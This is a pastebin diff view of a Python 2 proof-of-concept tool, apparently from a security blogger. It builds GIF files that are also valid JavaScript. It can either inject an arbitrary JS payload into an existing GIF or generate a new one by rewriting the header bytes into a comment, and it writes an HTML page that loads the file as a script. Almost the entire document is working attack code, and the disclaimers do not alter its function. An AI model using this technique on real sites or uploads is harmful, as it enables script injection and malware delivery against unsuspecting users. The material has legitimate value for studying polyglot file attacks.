View difference between Paste ID: <a href="/3j7B2mk3">3j7B2mk3</a> and <a href="/6yUbfGX5">6yUbfGX5</a>

#!/usr/bin/env python2
1		#!/usr/bin/env python2
2		#============================================================================================================#
3		#======= Simply injects a JavaScript Payload into a GIF. ====================================================#
4		#======= or it creates a JavaScript Payload as a GIF. ====================================================#
5		#======= The resulting GIF must be a valid (not corrupted) GIF. =============================================#
6		#======= Author: marcoramilli.blogspot.com ==================================================================#
7		#======= Version: PoC (don't even think to use it in development env.) ======================================#
8		#======= Disclaimer: ========================================================================================#
9		#THIS IS NOT PEP3 FORMATTED
10		#THIS SOFTWARE IS PROVIDED BY THE AUTHOR "AS IS" AND ANY EXPRESS OR
11		#IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
12		#WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
13		#DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT,
14		#INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
15		#(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
16		#SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
17		#HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
18		#STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING
19		#IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
20		#POSSIBILITY OF SUCH DAMAGE.
21		#===========================================================================================================#
22		import argparse
23		import os
24
25
26		#---------------------------------------------------------
27		def _hexify(num):
28		"""
29		Converts and formats to hexadecimal
30		"""
31		num = "%x" % num
32		if len(num) % 2:
33		num = '0'+num
34		return num.decode('hex')
35
36
37		#---------------------------------------------------------
38		def _generate_and_write_to_file(payload, fname):
39		"""
40		Generates a fake but valid GIF within scriting
41		"""
42		f = open(fname, "wb")
43		header = (b'\x47\x49\x46\x38\x39\x61' #Signature + Version GIF89a
44		b'\x2F\x2A' #Encoding /* it's a valid Logical Screen Width
45		b'\x0A\x00' #Smal Logical Screen Height
46		b'\x00' #GCTF
47		b'\xFF' #BackgroundColor
48		b'\x00' #Pixel Ratio
49		b'\x2C\x00\x00\x00\x00\x2F\x2A\x0A\x00\x00\x02\x00\x3B' #GlobalColorTable + Blocks
50		b'\x2A\x2F' #Commenting out */
51		b'\x3D\x31\x3B' # enable the script side by introducing =1;
52		)
53		trailer = b'\x3B'
54		# I made this explicit, step by step .
55		f.write(header)
56		f.write(payload)
57		f.write(trailer)
58		f.close()
59		return True
60
61
62		#---------------------------------------------------------
63		def _generate_launching_page(f):
64		"""
65		Creates the HTML launching page
66		"""
67		htmlpage ="""
68		<html>
69		<head><title>Opening an image</title> </head>
70		<body>
71		<img src=\"""" + f + """_malw.gif\"\>
72		<script src= \"""" + f + """_malw.gif\"> </script>
73		</body>
74		</html>
75		"""
76		html = open("run.html", "wb")
77		html.write(htmlpage);
78		html.close()
79		return True
80
81
82		#---------------------------------------------------------
83		def _inject_into_file(payload, fname):
84		"""
85		Injects the payload into existing GIF
86		NOTE: if the GIF contains \xFF\x2A and/or \x2A\x5C might caouse issues
87		"""
88		# I know, I can do it all in memory and much more fast.
89		# I wont do it here.
90		with open(fname + "_malw.gif", "w+b") as fout:
91		with open(fname, "rt") as fin:
92		for line in fin:
93		ls1 = line.replace(b'\x2A\x2F', b'\x00\x00')
94		ls2 = ls1.replace(b'\x2F\x2A', b'\x00\x00')
95		fout.write(ls2)
96		fout.seek(6,0)
97		fout.write(b'\x2F\x2A') #/*
98
99		f = open(fname + "_malw.gif", "a+b") #appending mode
100		f.write(b'\x2A\x2F\x3D\x31\x3B')
101		f.write(payload)
102		f.write(b'\x3B')
103		f.close()
104		return True
105
106
107		#---------------------------------------------------------
108		if __name__ == "__main__":
109		parser = argparse.ArgumentParser()
110		parser.add_argument("filename",help="the gif file name to be generated/or infected")
111		parser.add_argument("js_payload",help="the payload to be injected. For exmample: \"alert(\"test\");\"")
112		parser.add_argument("-i", "--inject-to-existing-gif", action="store_true", help="inject into the current gif")
113		args = parser.parse_args()
114		print("""
115		\|======================================================================================================\|
116		\| [!] legal disclaimer: usage of this tool for injecting malware to be propagated is illegal. \|
117		\| It is the end user's responsibility to obey all applicable local, state and federal laws. \|
118		\| Authors assume no liability and are not responsible for any misuse or damage caused by this program \|
119		\|======================================================================================================\|
120		"""
121		)
122		if args.inject_to_existing_gif:
123		_inject_into_file(args.js_payload, args.filename)
124		else:
125		_generate_and_write_to_file(args.js_payload, args.filename)
126
127		_generate_launching_page(args.filename)
128		print "[+] Finished!"